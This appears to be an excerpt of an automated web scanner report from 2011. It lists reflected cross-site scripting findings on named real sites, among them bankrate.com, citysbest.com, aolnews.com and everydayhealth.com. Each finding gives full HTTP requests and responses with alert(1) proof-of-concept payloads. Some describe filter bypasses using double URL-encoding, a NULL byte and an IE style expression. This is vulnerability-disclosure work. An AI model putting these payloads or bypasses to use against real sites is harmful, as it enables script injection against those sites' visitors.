if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='15133110431304557034';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='19842<script>alert(1)</script>d909d40b397';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.166. http://view.c3metrics.com/v.js [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload edd5c<script>alert(1)</script>923b8682cad was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=aol&cid=480edd5c<script>alert(1)</script>923b8682cad&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1037
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s2; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=aol&cid=480edd5c<script>alert(1)</script>923b8682cad&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a
...[SNIP]...

5.167. http://view.c3metrics.com/v.js [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 4d420<script>alert(1)</script>f20f5fc8715 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=aol4d420<script>alert(1)</script>f20f5fc8715&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1037
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s3; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=aol4d420<script>alert(1)</script>f20f5fc8715&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new
...[SNIP]...

5.168. http://view.c3metrics.com/v.js [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 58e31<script>alert(1)</script>3e94f7bd64d was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=aol&cid=480&t=7258e31<script>alert(1)</script>3e94f7bd64d HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1037
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s10; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=aol&cid=480&t=7258e31<script>alert(1)</script>3e94f7bd64d&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a);var
...[SNIP]...

5.169. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.aolnews.com
Path:	/category/goodnews/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c033e"%3bf7c25182fc9 was submitted in the REST URL parameter 2. This input was echoed as c033e";f7c25182fc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /category/goodnewsc033e"%3bf7c25182fc9/ HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:56:20 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
channel="us.news";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="";
s_265.prop2="main";
s_265.prop12="http://www.aolnews.com/category/goodnewsc033e";f7c25182fc9/";
s_265.prop18="goodnewsc033e\";f7c25182fc9";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.170. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bankrate.com
Path:	/funnel/mortgages/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7abf6"style="x:expression(alert(1))"ef43b8923ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /funnel/mortgages/?7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/funnel/mortgages/?7abf6"style="x:expression(alert(1))"ef43b8923ec=1" />
...[SNIP]...

5.171. http://www.citysbest.com/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89199"><script>alert(1)</script>cd5f8e88860 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:46 GMT; path=/
Content-Type: text/html
Content-Length: 15674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860"/>
...[SNIP]...

5.172. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f2e5"><script>alert(1)</script>6009f09c189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:05 GMT; path=/
Content-Type: text/html
Content-Length: 15691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1"/>
...[SNIP]...

5.173. http://www.citysbest.com/traffic/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0958"><script>alert(1)</script>e2e8451909c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:36 GMT; path=/
Content-Type: text/html
Content-Length: 17532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643"/>
...[SNIP]...

5.174. http://www.citysbest.com/traffic/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6 was submitted in the REST URL parameter 1. This input was echoed as f3384</script><script>alert(1)</script>0ccc1ec0bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /trafficf3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:57 GMT; path=/
Content-Type: text/html
Content-Length: 17861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "trafficf3384</script><script>alert(1)</script>0ccc1ec0bf6" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

5.175. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.dailyfinance.com
Path:	/markets/mostactives

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7010'%3b71e04f33930 was submitted in the REST URL parameter 2. This input was echoed as b7010';71e04f33930 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /markets/mostactivesb7010'%3b71e04f33930 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Content-Language: en
Content-Length: 68717
Keep-Alive: timeout=5, max=999
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers:</titl
...[SNIP]...

...[SNIP]...

5.176. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc36d'%3bf5e1aa920da was submitted in the REST URL parameter 2. This input was echoed as fc36d';f5e1aa920da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /allergy/climate-change-and-allergies.aspxfc36d'%3bf5e1aa920da HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBurMtkMjIxMTI2NS01ODVmLTQwMjYtOTNhZi1lZDQyOGE5ZWU2Y2E1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dbvjd455jngipsngirkccraw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/allergy/climate-change-and-allergies.aspxfc36d';f5e1aa920da', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.177. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e76"><script>alert(1)</script>76c82397b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6e76"><script>alert(1)</script>76c82397b8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO*ri-NiNTMxMWZkZS04NTY4LTRiYjEtODAwOC0xN2Q0NzQ1YTM0NGQ1; expires=Wed, 13-Jul-2011 21:36:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c5cfbq55mbxvfz55feiauhef; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49343

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1" />
...[SNIP]...

5.178. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac7e'%3b98481e38035 was submitted in the REST URL parameter 3. This input was echoed as 8ac7e';98481e38035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e'%3b98481e38035 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPFHohNiNzhlZWI5Mi02YzQyLTQyMWMtOWExZS1iZWJlZjRmYjg5ZTU1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hxo2de55iuwcrdvelxqosn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
